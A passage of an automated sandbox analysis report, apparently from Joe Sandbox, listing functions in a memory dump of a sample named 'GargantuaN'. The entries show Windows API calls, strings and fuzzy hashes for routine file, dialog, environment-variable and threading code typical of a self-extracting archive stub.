                                                        • Thread pool initialization failed., xrefs: 00D60EB7
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                        • String ID: Thread pool initialization failed.
                                                        • API String ID: 3340455307-2182114853
                                                        • Opcode ID: 6bcd7137a04eb8c2b7a8bea38b1c5f60503eb34ce591990cc56ee358261403a7
                                                        • Instruction ID: e26d5f34d5c16b255ff747300a058432ca4ed1fbde551c3e50e255bba627d27d
                                                        • Opcode Fuzzy Hash: 6bcd7137a04eb8c2b7a8bea38b1c5f60503eb34ce591990cc56ee358261403a7
                                                        • Instruction Fuzzy Hash: 8B1151B16407199FC3215F6A9C849A7FFECEB65744F14482EF5DAC3201D6B299418B70
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D51316: GetDlgItem.USER32(00000000,00003021), ref: 00D5135A
                                                          • Part of subcall function 00D51316: SetWindowTextW.USER32(00000000,00D835F4), ref: 00D51370
                                                        • EndDialog.USER32(?,00000001), ref: 00D6B2BE
                                                        • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 00D6B2D6
                                                        • SetDlgItemTextW.USER32(?,00000067,?), ref: 00D6B304
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ItemText$DialogWindow
                                                        • String ID: GETPASSWORD1
                                                        • API String ID: 445417207-3292211884
                                                        • Opcode ID: 49375dbfad39df216be2636d08d096199865297a8f6ff530bdd6f17fe5b2b623
                                                        • Instruction ID: 2007941f28f67c22e6a15bdfb0fbd2dcf76f7407f0669a8497008e8c50747176
                                                        • Opcode Fuzzy Hash: 49375dbfad39df216be2636d08d096199865297a8f6ff530bdd6f17fe5b2b623
                                                        • Instruction Fuzzy Hash: 0311E532A40214BBDB119A649C59FFE376CEF09720F040022FA85F6180C7A0D9849771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RENAMEDLG$REPLACEFILEDLG
                                                        • API String ID: 0-56093855
                                                        • Opcode ID: 20f93dd174f6050e4beafa374017caec9456164ab17c68293a59aded8497feb0
                                                        • Instruction ID: 16b0df9376b39068a6fd22bd0b1e836edeece8e346c2854e98a8b0efec73dbab
                                                        • Opcode Fuzzy Hash: 20f93dd174f6050e4beafa374017caec9456164ab17c68293a59aded8497feb0
                                                        • Instruction Fuzzy Hash: E9012176B04385EFD711AF95FC44A5A7BAAFB4A754B140426F946D3330C6319850EFB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6DBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00D6DBF4
                                                        • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D6DC30
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: EnvironmentVariable
                                                        • String ID: sfxcmd$sfxpar
                                                        • API String ID: 1431749950-3493335439
                                                        • Opcode ID: 909cb976c9d7f328d04621c7131b5cec37eb81adb8dcfd5814b45ae69ae95f04
                                                        • Instruction ID: 7634252913dc6a998f4142085231457157bbcaddd0a08cd0c2b34ca1c758ba9a
                                                        • Opcode Fuzzy Hash: 909cb976c9d7f328d04621c7131b5cec37eb81adb8dcfd5814b45ae69ae95f04
                                                        • Instruction Fuzzy Hash: 0DF0E5B2904328ABCB202F94AC0AFFB3B59EF08F82B090411FD89D6155E6B0C940D7F0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D79A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: __alldvrm$_strrchr
                                                        • String ID:
                                                        • API String ID: 1036877536-0
                                                        • Opcode ID: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                        • Instruction ID: 9e8694fac771eabc8cb62abdf3ea31789bf71763edbddec4be63a13124d063e1
                                                        • Opcode Fuzzy Hash: 15e7b98f52cb345e5770fd34cbf54b95dbf5428e1727e1497290f0e3bad33655
                                                        • Instruction Fuzzy Hash: BDA128739047869FEB22CF28C8A17AEFBE5EF55310F18816DE58D9B281E2358941C770
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00D57F69,?,?,?), ref: 00D5A3FA
                                                        • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00D57F69,?), ref: 00D5A43E
                                                        • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00D57F69,?,?,?,?,?,?,?), ref: 00D5A4BF
                                                        • CloseHandle.KERNEL32(?,?,?,00000800,?,00D57F69,?,?,?,?,?,?,?,?,?,?), ref: 00D5A4C6
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File$Create$CloseHandleTime
                                                        • String ID:
                                                        • API String ID: 2287278272-0
                                                        • Opcode ID: 3b9d21631c9d271b551c86c99d455cb7c96d8c2b9ab8d554b5487ac715ea301f
                                                        • Instruction ID: 60da8625b3da1158e79b03a1d4f955951d021b4e797119153ecb89fb1cea89b8
                                                        • Opcode Fuzzy Hash: 3b9d21631c9d271b551c86c99d455cb7c96d8c2b9ab8d554b5487ac715ea301f
                                                        • Instruction Fuzzy Hash: 2A41E1301483919BEB21DFA8DC45BAEBBE49B80705F080A19BDD5D7290D6A49A0C9B73
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D51100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID:
                                                        • API String ID: 176396367-0
                                                        • Opcode ID: 7a414a45e5cc2c301085f6307c7558d90a78c41e13eb4950f7983b4bbac35cc9
                                                        • Instruction ID: 1ba8084a4df059f338290daab463eff8ab579741012630292a68a7686f501f5f
                                                        • Opcode Fuzzy Hash: 7a414a45e5cc2c301085f6307c7558d90a78c41e13eb4950f7983b4bbac35cc9
                                                        • Instruction Fuzzy Hash: 7341D8759006699BCB25AF68CC46ADF7BB8EF01311F044119FD46F7241DB70AE498BB4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D7C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D791E0,?,00000000,?,00000001,?,?,00000001,00D791E0,?), ref: 00D7C9D5
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D7CA5E
                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D76CBE,?), ref: 00D7CA70
                                                        • __freea.LIBCMT ref: 00D7CA79
                                                          • Part of subcall function 00D78E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7CA2C,00000000,?,00D76CBE,?,00000008,?,00D791E0,?,?,?), ref: 00D78E38
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                        • String ID:
                                                        • API String ID: 2652629310-0
                                                        • Opcode ID: 84c0a8832f7cbd910ad19124959d0e15f1d09ddc750f0d3c9b94d3b66241b288
                                                        • Instruction ID: b9fcca041b7b877b0dae3cd3110f7ce1acea3bbb54e568557d9393167f9308e4
                                                        • Opcode Fuzzy Hash: 84c0a8832f7cbd910ad19124959d0e15f1d09ddc750f0d3c9b94d3b66241b288
                                                        • Instruction Fuzzy Hash: 8631B072A2021AAFDF25DF64DC45DAE7BA5EB41711B18812CFC08E6250EB35CD50CBB0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetDC.USER32(00000000), ref: 00D6A666
                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00D6A675
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D6A683
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00D6A691
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: CapsDevice$Release
                                                        • String ID:
                                                        • API String ID: 1035833867-0
                                                        • Opcode ID: 1f04ac6ee063a7420b0a748d9cc1be7fd8033c3b1d177925fa343af91f2542b3
                                                        • Instruction ID: 43fd217eee8bc7ea9b81f2979a5607a7be9463addb965e4df6481c9435690a14
                                                        • Opcode Fuzzy Hash: 1f04ac6ee063a7420b0a748d9cc1be7fd8033c3b1d177925fa343af91f2542b3
                                                        • Instruction Fuzzy Hash: C3E0EC31942B22E7D6616F64AD0DB8A3E64AF16F52F050212FA05E6390DB6486009BB1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D6A699: GetDC.USER32(00000000), ref: 00D6A69D
                                                          • Part of subcall function 00D6A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D6A6A8
                                                          • Part of subcall function 00D6A699: ReleaseDC.USER32(00000000,00000000), ref: 00D6A6B3
                                                        • GetObjectW.GDI32(?,00000018,?), ref: 00D6A83C
                                                          • Part of subcall function 00D6AAC9: GetDC.USER32(00000000), ref: 00D6AAD2
                                                          • Part of subcall function 00D6AAC9: GetObjectW.GDI32(?,00000018,?), ref: 00D6AB01
                                                          • Part of subcall function 00D6AAC9: ReleaseDC.USER32(00000000,?), ref: 00D6AB99
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: ObjectRelease$CapsDevice
                                                        • String ID: (
                                                        • API String ID: 1061551593-3887548279
                                                        • Opcode ID: 6f463a9c3ae017dcdbd5a72fedde51e5878ad32f0ee8c1889cc61d7c33cbce5d
                                                        • Instruction ID: 89df308f017fb9e95450f07a90774691b300e5add64cbede257ce55b38370f98
                                                        • Opcode Fuzzy Hash: 6f463a9c3ae017dcdbd5a72fedde51e5878ad32f0ee8c1889cc61d7c33cbce5d
                                                        • Instruction Fuzzy Hash: E691D0B1608355AFD610DF69C844A2BBBE8FFC9700F00495EF59AD3260DB30A945CF62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D575DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __EH_prolog.LIBCMT ref: 00D575E3
                                                          • Part of subcall function 00D605DA: _wcslen.LIBCMT ref: 00D605E0
                                                          • Part of subcall function 00D5A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D5A598
                                                        • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D5777F
                                                          • Part of subcall function 00D5A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D5A325,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A501
                                                          • Part of subcall function 00D5A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D5A325,?,?,?,00D5A175,?,00000001,00000000,?,?), ref: 00D5A532
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                        • String ID: :
                                                        • API String ID: 3226429890-336475711
                                                        • Opcode ID: 4674f984e2525b7dea212fdff87a4ca71e16d4abf82606aae60f17d8c4028467
                                                        • Instruction ID: 428a2d596026a7df3c35664d35dfa2e36a85494d11c580407e75efd7aeecff5a
                                                        • Opcode Fuzzy Hash: 4674f984e2525b7dea212fdff87a4ca71e16d4abf82606aae60f17d8c4028467
                                                        • Instruction Fuzzy Hash: 22416F71801168AAEF25EB64DC55EEEB778EF45301F104096BE09A3092DB749F8CCB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: }
                                                        • API String ID: 176396367-4239843852
                                                        • Opcode ID: 22c6e507616556e042bd7d31f8911065f107cd2ad271cf3a878ee287c6e3ce39
                                                        • Instruction ID: 8eb3b72ae3fbf8a69a7d95792d955595f916df96ec4dd2933734d972c6deac90
                                                        • Opcode Fuzzy Hash: 22c6e507616556e042bd7d31f8911065f107cd2ad271cf3a878ee287c6e3ce39
                                                        • Instruction Fuzzy Hash: DF2181729043165BD731EA64D845AAAB3ECDF91764F18082BF545C3142FB65E98883B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00D5F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D5F2E4
                                                          • Part of subcall function 00D5F2C5: GetProcAddress.KERNEL32(00D981C8,CryptUnprotectMemory), ref: 00D5F2F4
                                                        • GetCurrentProcessId.KERNEL32(?,?,?,00D5F33E), ref: 00D5F3D2
                                                        Strings
                                                        • CryptUnprotectMemory failed, xrefs: 00D5F3CA
                                                        • CryptProtectMemory failed, xrefs: 00D5F389
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$CurrentProcess
                                                        • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                        • API String ID: 2190909847-396321323
                                                        • Opcode ID: 5455bfab9769c5b6c4b2a5e188a457f2f59ad81c5fcee82b86a599973535b405
                                                        • Instruction ID: 251a1152865813dee9902408b25455c5eba3681050b877348d7d1bc4d7e4950c
                                                        • Opcode Fuzzy Hash: 5455bfab9769c5b6c4b2a5e188a457f2f59ad81c5fcee82b86a599973535b405
                                                        • Instruction Fuzzy Hash: 4C11D031A01329ABFF15AF24DC45A6E3B54EF01B62B08412AFC45AF351DA74DE4987B4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D5B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _swprintf.LIBCMT ref: 00D5B9B8
                                                          • Part of subcall function 00D54092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D540A5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D8E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000D95000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645065632.0000000000DB2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645133407.0000000000DB3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_d50000_GargantuaN.jbxd
                                                        Similarity
                                                        • API ID: __vswprintf_c_l_swprintf
                                                        • String ID: %c:\
                                                        • API String ID: 1543624204-3142399695
                                                        • Opcode ID: 47d537f10707affc4ad7c242dcb7bc46f21cf2d316a8e1c2d3a1ad465121f82b
                                                        • Instruction ID: e6e5a39736be9692f97131dc6fd860aba9b43da224405e6fd587d8aef4a5cb9e
                                                        • Opcode Fuzzy Hash: 47d537f10707affc4ad7c242dcb7bc46f21cf2d316a8e1c2d3a1ad465121f82b
                                                        • Instruction Fuzzy Hash: A701F56350031169DE30AB358C42D7BA7ACEF91771B54850FFD48D7082FB60D84887B1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00D6101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateThread.KERNEL32(00000000,00010000,00D61160,?,00000000,00000000), ref: 00D61043
                                                        • SetThreadPriority.KERNEL32(?,00000000), ref: 00D6108A
                                                          • Part of subcall function 00D56C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D56C54
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1645005808.0000000000D51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D50000, based on PE: true
                                                        • Associated: 00000001.00000002.1644982121.0000000000D50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000001.00000002.1645042455.0000000000D83000.00000002.00000001.01000000.00000009.sdmpDownload File
